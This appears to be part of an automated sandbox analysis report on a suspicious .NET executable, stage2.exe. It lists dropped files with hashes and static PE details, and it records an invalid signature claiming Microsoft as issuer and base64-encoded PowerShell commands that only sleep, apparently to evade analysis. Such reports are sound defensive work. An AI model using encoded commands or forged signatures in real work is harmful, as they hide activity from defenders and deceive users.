                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.8.8.8.7.3.0.7.3.8.2.6.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.8.8.8.7.4.1.3.3.2.0.1.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.b.4.c.0.5.7.-.f.5.c.4.-.4.c.3.b.-.9.f.9.0.-.4.e.0.f.5.3.a.3.7.8.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.a.4.c.1.c.c.-.3.7.f.f.-.4.5.9.4.-.8.e.8.7.-.1.0.0.6.c.0.a.2.e.6.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.t.a.g.e.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.b.o.p.b.h...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.c.-.0.0.0.1.-.0.0.1.c.-.0.8.c.a.-.0.0.5.c.8.c.0.b.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.2.0.c.f.5.e.9.6.c.6.9.c.0.3.a.3.e.0.a.a.e.0.d.7.e.2.8.e.b.0.0.0.0.0.0.0.0.0.!.0.0.0.0.1.6.5.2.5.c.b.2.f.d.8.6.d.c.e.8.4.2.1.0.7.e.b.1.b.a.6.1.7.4.b.2.3.f.1.8.8.5.3.7.!.s.
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14DB.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Mon Jan 17 10:25:36 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):273022
                                                      Entropy (8bit):3.853179800245628
                                                      Encrypted:false
                                                      SSDEEP:3072:cGlpb60CrUCgU/aDDrs0wTcjd+p+otu9gIOgF5oaIq:cGlwXTjCDDQ00p+79RpD
                                                      MD5:47039F84D9CE3BB540A5FF9C7A61CF31
                                                      SHA1:85474DBDAB51F24FA6D607CC52DC64AAEB7B50B2
                                                      SHA-256:C9804775D078275DF81CF7CFFF3FBACCBD3BD9320912BA0976EFEDCAE3010692
                                                      SHA-512:357F888EDC052948B989FEFD8E8195F80C834D85E4F019887F0D5810AAA3B53691ACA450D4CF66D4DB98EAACF4463904E78E456EA7F2E6A7FC40D774E06737DB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: MDMP....... ....... D.a........................X!..(.......T....*.......'...X..........`.......8...........T............]...............*...........,...................................................................U...........B......X-......GenuineIntelW...........T............C.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER318C.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.6933539692953867
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNisE6isU6YFfSU6PgmfZjQSnCpr/89bq4sfxDum:RrlsNi36isU6Y9SU6PgmfdQS/qrf1
                                                      MD5:0306EC771A2FC951837BE91CFBF8E011
                                                      SHA1:3A272CDBEA785BE069408708146463007864479B
                                                      SHA-256:8335F027896C9E2A3D22A7B4DEBDD792618D2F87BF1A92B82685CBA121F160E6
                                                      SHA-512:94C083DAA372FE2F7B40155FABCE226B4D09AA8C1BBA7DBAC71574C488B11C03E8F35ED334CB7C11DF4C4D277876631CEC2F52926393233BEB8648D34D522656
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.4.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3611.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4725
                                                      Entropy (8bit):4.437433265070294
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsaJgtWI9jMXjSWSC8BQs8fm8M4JNfJF7EI+q8vjfBnLf2S9SNd:uITfoEMXjzSNORJzK1L2S9SNd
                                                      MD5:507EFECDC1ABF8B2E8511E0F7A40ABB0
                                                      SHA1:0E29D507CD2497027B125A0C9C2B13D06A084595
                                                      SHA-256:AC230930084B32AC3153DA023ACE28A1C3614C28E833BF3A3EB4D8F02C4E2482
                                                      SHA-512:44239E9BE6D2B9E6F33B989698A835DBCFB49F0765FAA03C99149A193C1FF6A85D0FD1147A31EBC26A97DFC3C9D6C919EA9ABD9D982C187DEC496DD32AE4B798
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1346136" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5829
                                                      Entropy (8bit):4.8968676994158
                                                      Encrypted:false
                                                      SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                      MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                      SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                      SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                      SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):16360
                                                      Entropy (8bit):5.56095611490378
                                                      Encrypted:false
                                                      SSDEEP:384:nt9/62zDkCGm9M3i6b+cBSBKnQultIK8tpRuFZU9NnaqYCy:+YGm+3J74KQultAnRo+ajV
                                                      MD5:251C0346B0D4B607AE0308E7A63905CC
                                                      SHA1:259BD3A23B07329B366836FEABFC5C375C2CFD98
                                                      SHA-256:ABD1AC4894EA5AC7AF272589E97472DFA394A8B3E0A92120732E551978952D42
                                                      SHA-512:45A9CCB3AD2146A584CBFE34BEFF38789D2811F12388F3078444CCEB52C203E47957906DB42311EA00CAC6E322DB5460B255F1E11EA1225254ADB8CCF1FE4BA1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: @...e...............................[.B.:.u..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hiw1gde.haw.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfyzxky1.kbr.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw2ltvwn.ds0.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.7m2ZOLtQ.20220117022409.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.124059992328832
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAexvBnGx2DOXUWj5i5WiHjeTKKjX4CIym1ZJXnBWnxSAZgS:BZavhGoOziqDYB1ZdB4ZZgS
                                                      MD5:BBD1DFD615841C5948E4F29E6C82F116
                                                      SHA1:DD38516AE01450D37B9C323A441FCAA51E9D948C
                                                      SHA-256:46C7D5E25E092B25F45D7832CCE18B4FDBE5F3B2F30FDB9E7F05172A6F1CE603
                                                      SHA-512:F727C3068F7F45758F571F1ED85C002EED9D1E49074F2277B1A0D25B18D68D270054762D108CEB3B5ABE264520B6A72E8AFB7AB401C999981EE3F0AD72466E49
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022418..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022419..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117022742..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117022742..**********************..
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.vEnUoizJ.20220117022446.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.129269732116244
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAixvBnGx2DOXUWj5i5WUHjeTKKjX4CIym1ZJX2nxSAZW:BZevhGoOzUqDYB1ZOZZW
                                                      MD5:B5EF0789C51BC25618A8B8380106F073
                                                      SHA1:C4B515F96607777B8ECCF44C84F014744D7C8AD3
                                                      SHA-256:6CF2DBD9945C70552992020AA9F6F0028209C8EAE18D1B080ABF9E75C5A25750
                                                      SHA-512:2D04D6AF284F7D97C3157A211B85A21AD8ACBF760D5A10C101A67212EE44204B3FFF9DBB37892258D50CB32B053CFDBE7635C76A93E2D65113509325A5F6136D
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022458..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022458..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117023016..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117023016..**********************..
                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1572864
                                                      Entropy (8bit):4.2717574458854735
                                                      Encrypted:false
                                                      SSDEEP:12288:7XBO1fBqU8EJBPgZy54wpZkRyo2Fqhn4agUVxYqolztxIQaLyHYaPeK:jBO1fBqU8EJBPgbE
                                                      MD5:374743508B8FDB08634F0B0FBB5571B8
                                                      SHA1:B86A1ED991E72FC4B4D930AB33BBA15CB1B0FB26
                                                      SHA-256:45420FB69A145CE87CB8B4B442D93AAF2A167AD97FF2C0B02A4FC7F6C5F1E1A8
                                                      SHA-512:016B1471EDF41C095AB092B75AC2C12FD86A1A16EC10929DB709B0276A01707FA3ABA4D5BA41784C5F49E41490EF1AAD312F3F506013F62F0FD163B06730630D
                                                      Malicious:false
                                                      Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..I.................................................................................................................................................................................................................................................................................................................................................j.B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):4.038364930198759
                                                      Encrypted:false
                                                      SSDEEP:384:FOl/5Rftx1GPJ4XZsFknM7ktPBqXWSeq5QMVyi6+/ml4Lk4KZd1DoXzkNKcmLzdE:olBRftx18J4XuFkM7KBqX9eq5QMVyi6e
                                                      MD5:1E6B5359110A436CD426A10C18A64BD9
                                                      SHA1:233D103FF0DF3EFD1788D1793E2DC82660BE1646
                                                      SHA-256:6EC713C240E5C0E01BEC5D131A8263237F04CB2D77EC465FC7914CA090BB8DEC
                                                      SHA-512:339ADC6FA78B9DD339F29002B4E53BDA4F70611231379A6BA638F92656B60F3DC1E6573D76DAF5A76177BD6EA3E451147A01A59707BEB75B1542CF4DA37AD933
                                                      Malicious:false
                                                      Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..I.................................................................................................................................................................................................................................................................................................................................................l.B.HvLE.^......Y...........&I/......ME............0................... ..hbin................p.\..,..........nk,...I..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...I......... ........................... .......Z.......................Root........lf......Root....nk ...I......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.133399721297699
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:stage2.exe
                                                      File size:214944
                                                      MD5:14c8482f302b5e81e3fa1b18a509289d
                                                      SHA1:16525cb2fd86dce842107eb1ba6174b23f188537
                                                      SHA256:dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
                                                      SHA512:fdaaac4ee73db90f69dc43a20f24d8f80a2f659288d28538c6fd1946b8861bb161b41ad3bcd65d16843cd21350e95c606f991a990110e100029b58abce978353
                                                      SSDEEP:3072:vf1GlJZUnjNbGgNQfYySIHiP1WLz4PcSOvG2jxZ:FbGoJ8iP19PjmGyf
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:E.a.................B...D......Na... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:b270f086c6c2caf0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x40614e
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x61DC453A [Mon Jan 10 14:39:54 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 12/15/2020 1:29:14 PM 12/2/2021 1:29:14 PM
                                                      Subject Chain
                                                      • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Version:3
                                                      Thumbprint MD5:1A1395EF5FC0A90A5B83AC4B531EEAC9
                                                      Thumbprint SHA-1:312860D2047EB81F8F58C29FF19ECDB4C634CF6A
                                                      Thumbprint SHA-256:416F4C0A00D1C4108488A04C2519325C5AA13BC80D0C017C45B00B911B8370A9
                                                      Serial:33000002ED2C45E4C145CF48440000000002ED

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x61000x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x24118.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x288000xbfa0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x41540x4200False0.578006628788data5.88284633145IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x80000x241180x24200False0.156378406142data3.54772483226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x2e0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
